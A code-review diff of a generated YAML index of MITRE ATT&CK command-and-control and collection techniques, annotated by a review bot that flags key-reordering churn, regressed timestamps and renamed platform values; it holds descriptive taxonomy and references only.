- kill_chain_name: mitre-attack
phase_name: command-and-control
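Review bot: the T1090.003 description flips from a `|-` literal block to a double-quoted folded scalar, which makes the hunk read as a full rewrite when the only content change is the new sentence ending in `(Citation: ORB Mandiant) \n\n`. The trailing space in that upstream sentence is what forces the YAML dumper into quoted style, and the `\ Protocols such as ICMP` escape preserves a double space from the source text; both are harmless but worth a line in the PR description so reviewers do not diff the paragraph by hand.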
@@ -38991,7 +39468,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -39005,6 +39482,11 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1090/003
external_id: T1090.003
+ - source_name: ORB Mandiant
+ description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+ Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+ July 8, 2024.
+ url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
- source_name: NGLite Trojan
description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -39018,12 +39500,11 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.003
atomic_tests: []
T1001:
technique:
- modified: '2024-02-02T19:04:35.389Z'
+ modified: '2024-10-07T15:07:47.232Z'
name: Data Obfuscation
description: 'Adversaries may obfuscate command and control traffic to make
it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -39073,11 +39554,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1571:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:37:57.868Z'
name: Non-Standard Port
description: |-
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -39086,20 +39566,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
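Review bot: this T1571 hunk changes no values at all: `x_mitre_deprecated: false`, `x_mitre_domains:` / `- enterprise-attack` and `x_mitre_is_subtechnique: false` are simply moved above `x_mitre_platforms`. Same request as for the T1102 hunk: make the generator's key order deterministic so reorder-only churn stops appearing in future regenerations.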
@@ -39124,17 +39604,16 @@ command-and-control:
url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
- source_name: Fortinet Agent Tesla April 2018
description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
Variant. Retrieved November 5, 2018.
url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1571
atomic_tests: []
T1573:
@@ -39190,7 +39669,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1573
atomic_tests: []
T1102.002:
@@ -39215,7 +39693,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:15:47.861Z'
name: Bidirectional Communication
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
@@ -39252,8 +39730,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1573.002:
technique:
@@ -39307,7 +39783,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1095:
technique:
@@ -39379,33 +39854,12 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1095
atomic_tests: []
T1001.003:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
- type: attack-pattern
- created: '2020-03-15T00:40:27.503Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1001.003
- url: https://attack.mitre.org/techniques/T1001/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
- name: Protocol Impersonation
+ modified: '2024-10-09T15:40:19.436Z'
+ name: Protocol or Service Impersonation
description: "Adversaries may impersonate legitimate protocols or web service
traffic to disguise command and control activity and thwart analysis efforts.
By impersonating legitimate protocols or web services, adversaries can make
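Review bot: T1001.003 is renamed from `Protocol Impersonation` to `Protocol or Service Impersonation` and its version is bumped to `'2.0'` further down; any other generated artifact in this repository that carries the technique name (index tables, CSV indexes, Markdown listings) must be regenerated in the same PR or it will disagree with this file. The rest of the hunk is the same key reordering seen for T1102 and T1571.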
@@ -39413,23 +39867,61 @@ command-and-control:
\ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
like subsequent traffic is SSL/TLS encrypted, potentially interfering with
some security tooling, or to make the traffic look like it is related with
- a trusted entity. "
+ a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+ impersonate expected web traffic or trusted services. For example, adversaries
+ may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+ data to disguise C2 communications or mimic legitimate services such as Gmail,
+ Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+ Malleable-C2-U42)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - James Emery-Callcott, Emerging Threats Team, Proofpoint
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+ created: '2020-03-15T00:40:27.503Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1001/003
+ external_id: T1001.003
+ - source_name: Malleable-C2-U42
+ description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+ Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+ How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+ September 24, 2024.'
+ url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ - source_name: ESET Okrum July 2019
+ description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+ RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1090.004:
technique:
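Review bot: the expanded description cites `ESET Okrum July 2019` and `Malleable-C2-U42`, and both are added to `external_references` in this hunk, so citations and references line up. The `Malleable-C2-U42` author field (`Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia Siddhart Shibiraj`) has no separators between names; that is upstream ATT&CK data and should be left as-is rather than hand-corrected here.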
@@ -39476,7 +39968,6 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1132:
technique:
@@ -39536,7 +40027,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.002:
technique:
@@ -39568,7 +40058,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-14T23:39:50.117Z'
name: Non-Standard Encoding
description: 'Adversaries may encode data with a non-standard data encoding
system to make the content of command and control traffic more difficult to
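Review bot: `modified` moves backwards here, from 2021-04-29 to 2020-03-14 (L19927-L19928), and the same regression appears for T1001.002, T1008, T1102.001, T1560.003, T1114.001 and T1560.002 further down, while other objects in the patch (T1213.002, T1114, T1530) move forward to October 2024. A refresh should not normally decrease an object's `modified`; this pattern suggests the regenerated index is drawing some techniques from a different or re-baselined bundle than the rest. Confirm the data source, or make the generator fail when `modified` would go backwards.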
@@ -39594,8 +40084,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
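Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` (L19937) together with `spec_version` and adds no replacement, so T1132.002 is left with no attack-spec version at all, whereas techniques elsewhere in the patch keep or gain `x_mitre_attack_spec_version: 3.1.0`/`3.2.0`. If anything downstream filters or sorts on that key, these objects will be silently skipped; check whether the generator should be emitting the current value here as well.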
T1071.001:
technique:
@@ -39662,7 +40150,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.001
atomic_tests: []
T1105:
@@ -39760,7 +40247,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1105
atomic_tests: []
T1665:
@@ -39853,7 +40339,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1001.002:
technique:
@@ -39877,7 +40362,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-15T00:37:58.963Z'
name: Data Obfuscation via Steganography
description: 'Adversaries may use steganographic techniques to hide command
and control traffic to make detection efforts more difficult. Steganographic
@@ -39900,8 +40385,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1001.002
atomic_tests: []
T1008:
@@ -39926,7 +40409,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:49:47.340Z'
name: Fallback Channels
description: Adversaries may use fallback or alternate communication channels
if the primary channel is compromised or inaccessible in order to maintain
@@ -39946,8 +40429,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.001:
technique:
@@ -40001,7 +40482,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.001
atomic_tests: []
T1102.001:
@@ -40026,7 +40506,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:12:30.499Z'
name: Dead Drop Resolver
description: |-
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -40052,8 +40532,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1001.001:
technique:
@@ -40107,7 +40585,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
collection:
T1560.001:
@@ -40183,7 +40660,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560.001
atomic_tests: []
T1113:
@@ -40240,7 +40716,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1113
atomic_tests: []
T1557:
@@ -40334,7 +40809,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.001:
technique:
@@ -40413,7 +40887,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1602:
@@ -40452,7 +40925,7 @@ collection:
Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:32:58.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data from Configuration Repository
x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -40467,30 +40940,10 @@ collection:
- 'Network Traffic: Network Connection Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.002:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- created: '2020-02-14T13:35:32.938Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Sharepoint
description: |
Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
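Review bot: most of this hunk (L20083-L20102) is key reordering rather than a content change: `x_mitre_platforms`, `x_mitre_domains`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted here only to be re-emitted lower in the same object. Consider having the generator write keys in a stable (sorted) order so that a refresh like this shows only the substantive edits, such as the `modified` bump at L20102-L20103, and reviewers can actually see them.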
@@ -40499,13 +40952,17 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
@@ -40519,20 +40976,37 @@ collection:
of programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'Cloud Service: Cloud Service Metadata'
+ type: attack-pattern
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ created: '2020-02-14T13:35:32.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/002
+ external_id: T1213.002
+ - source_name: Microsoft SharePoint Logging
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
T1123:
technique:
- modified: '2024-01-23T22:53:18.389Z'
+ modified: '2024-10-15T13:39:22.774Z'
name: Audio Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
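Review bot: the substantive changes in this hunk are `x_mitre_platforms` going from `Office 365` to `Office Suite` (L20135-L20137), a new `Cloud Service: Cloud Service Metadata` data source (L20146) and the removal of `x_mitre_permissions_required` (L20142-L20143), matched by the version bump to 1.1 (L20138). They are hard to spot among the reordered keys, and the hunk also carries the start of T1123's `modified` change (L20165-L20166), so a sentence in the PR description listing which techniques actually changed content would help the next reviewer.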
@@ -40575,7 +41049,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1123
atomic_tests: []
T1560.003:
@@ -40600,7 +41073,7 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T22:48:14.605Z'
name: Archive via Custom Method
description: 'An adversary may compress or encrypt data that is collected prior
to exfiltration using a custom method. Adversaries may choose to use custom
@@ -40620,22 +41093,24 @@ collection:
x_mitre_data_sources:
- 'File: File Creation'
- 'Script: Script Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1114:
technique:
- modified: '2023-09-29T21:06:03.098Z'
+ modified: '2024-10-15T12:24:27.627Z'
name: Email Collection
description: 'Adversaries may target user email to collect sensitive information.
Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
+ that can prove valuable to adversaries. Emails may also contain details of
+ ongoing incident response operations, which may allow adversaries to adjust
+ their techniques in order to maintain persistence or evade defenses.(Citation:
+ TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+ can collect or forward email from mail servers or clients. '
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -40652,11 +41127,10 @@ collection:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '2.5'
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
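Review bot: `Office 365` and `Google Workspace` are both removed from `x_mitre_platforms` and replaced by the single `Office Suite` value (L20221-L20226); the same collapse happens for T1530 further down (L20494-L20497). Any artifact derived from this file by filtering on the old platform strings will no longer match these techniques and will silently shrink, so make sure every per-platform index is regenerated in the same change and that nothing still matches on `Office 365` or `Google Workspace`.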
@@ -40672,37 +41146,28 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1114
external_id: T1114
+ - source_name: CISA AA20-352A 2021
+ description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+ of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+ Retrieved August 30, 2024.
+ url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
Retrieved October 8, 2019.
url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ - source_name: TrustedSec OOB Communications
+ description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+ Out-of-Band Communications are Essential for Incident Response. Retrieved
+ August 30, 2024.'
+ url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1025:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - William Cain
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- type: attack-pattern
- created: '2017-05-31T21:30:31.584Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:30:50.936Z'
name: Data from Removable Media
description: "Adversaries may search connected removable media on computers
they have compromised to find files of interest. Sensitive data can be collected
@@ -40714,75 +41179,93 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - William Cain
+ x_mitre_deprecated: false
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
x_mitre_system_requirements:
- Privileges to access removable media drive and files
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created: '2017-05-31T21:30:31.584Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1025
atomic_tests: []
T1074.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Massimiliano Romano, BT Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- - source_name: Prevailion DarkWatchman 2021
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
